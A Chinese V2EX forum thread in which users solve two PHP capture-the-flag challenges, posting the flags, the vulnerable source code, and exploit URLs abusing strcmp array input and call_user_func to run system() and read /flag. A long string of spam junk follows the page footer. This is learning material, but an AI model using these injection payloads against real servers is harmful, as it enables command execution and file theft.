两道 PHP 题目,都是求 flag 值 - V2EX
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
Sign Up Now
For Existing Member  Sign In
yxzblue
0.01D
V2EX    PHP

两道 PHP 题目,都是求 flag 值

  •  
  •   yxzblue Oct 18, 2024 3517 views
    This topic created in 559 days ago, the information mentioned may be changed or developed.
    8 replies    2024-10-19 10:24:47 +08:00/span>
    virusdefender
        1
    virusdefender  
       Oct 18, 2024   1
    ctf 老技巧了
    Anakin078
        2
    Anakin078  
       Oct 18, 2024   1
    flag{c4ca4238a0b923820dcc509a6f75849b}
    flag{19a0664d0b3d997318f6e4940240e91c}
    Anakin078
        3
    Anakin078  
       Oct 18, 2024
    网络安全这么好玩,不去学一下吗 hhh
    user20190708
        4
    user20190708  
       Oct 18, 2024   1
    1.
    /?1=hacker&2[]=%0
    flag{c4ca4238a0b923820dcc509a6f75849b}

    2.
    /?a=system&b=find%20/%20-name%20"*flag*"
    /?a=read&b=/flag
    flag{19a0664d0b3d997318f6e4940240e91c}
    aloxaf
        5
    aloxaf  
       Oct 18, 2024
    拿去考了一下 AI ,发现 claude 3.5 真的不错,第一题准确判断出了是 strcmp 的参数漏洞,其他都都让我输入 flag……
    ahu
        6
    ahu  
       Oct 18, 2024   3
    第一题:

    <?php
    highlight_file(__FILE__);
    include('flag.php');
    $g = $_GET['1'];
    if (preg_match('/^hacker$/im', $g)) {
    if (strcmp($_GET['2'],$flag) == 0) {
    echo $flag;
    }
    }
    ?>

    考的是 strcmp 的漏洞:弱类型转换后 null == 0 。

    strcmp("foo", array()) => NULL + PHP Warning
    strcmp("foo", new stdClass) => NULL + PHP Warning
    strcmp(function(){}, "") => NULL + PHP Warning

    第二题:

    <?php
    highlight_file(__FILE__);

    function scan($directory){
    return var_dump(scandir($directory));
    }

    function read($f){
    echo file_get_contents($f);
    }

    call_user_func($_GET['a'], $_GET['b']);

    ?>

    考的是 call_user_func 的漏洞:如果直接将用户输入的内容作为参数,则可以执行任意命令。
    先用 ?a=scan&b=/ 找出 flag 文件,然后用 ?a=read&b=/flag 读出 flag 文件内容
    yxzblue
        7
    yxzblue  
    OP
       Oct 18, 2024
    感谢,提供思路
    vevlins
        8
    vevlins  
       Oct 19, 2024
    楼上说 ai 的那位给了启发,感觉 ai 还是可以的,我把代码给了 kimi ,两个问题都给出了问题点,稍微搜索一下对应知识点就找到了答案。
    About     Help     Advertise     Blog     API     FAQ     Solana     836 Online   Highest 6679       Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 45ms UTC 19:53 PVG 03:53 LAX 12:53 JFK 15:53
    Do have faith in what you're doing.
    ubao msn snddm index pchome yahoo rakuten mypaper meadowduck bidyahoo youbao zxmzxm asda bnvcg cvbfg dfscv mmhjk xxddc yybgb zznbn ccubao uaitu acv GXCV ET GDG YH FG BCVB FJFH CBRE CBC GDG ET54 WRWR RWER WREW WRWER RWER SDG EW SF DSFSF fbbs ubao fhd dfg ewr dg df ewwr ewwr et ruyut utut dfg fgd gdfgt etg dfgt dfgd ert4 gd fgg wr 235 wer3 we vsdf sdf gdf ert xcv sdf rwer hfd dfg cvb rwf afb dfh jgh bmn lgh rty gfds cxv xcv xcs vdas fdf fgd cv sdf tert sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf sdf shasha9178 shasha9178 shasha9178 shasha9178 shasha9178 liflif2 liflif2 liflif2 liflif2 liflif2 liblib3 liblib3 liblib3 liblib3 liblib3 zhazha444 zhazha444 zhazha444 zhazha444 zhazha444 dende5 dende denden denden2 denden21 fenfen9 fenf619 fen619 fenfe9 fe619 sdf sdf sdf sdf sdf zhazh90 zhazh0 zhaa50 zha90 zh590 zho zhoz zhozh zhozho zhozho2 lislis lls95 lili95 lils5 liss9 sdf0ty987 sdft876 sdft9876 sdf09876 sd0t9876 sdf0ty98 sdf0976 sdf0ty986 sdf0ty96 sdf0t76 sdf0876 df0ty98 sf0t876 sd0ty76 sdy76 sdf76 sdf0t76 sdf0ty9 sdf0ty98 sdf0ty987 sdf0ty98 sdf6676 sdf876 sd876 sd876 sdf6 sdf6 sdf9876 sdf0t sdf06 sdf0ty9776 sdf0ty9776 sdf0ty76 sdf8876 sdf0t sd6 sdf06 s688876 sd688 sdf86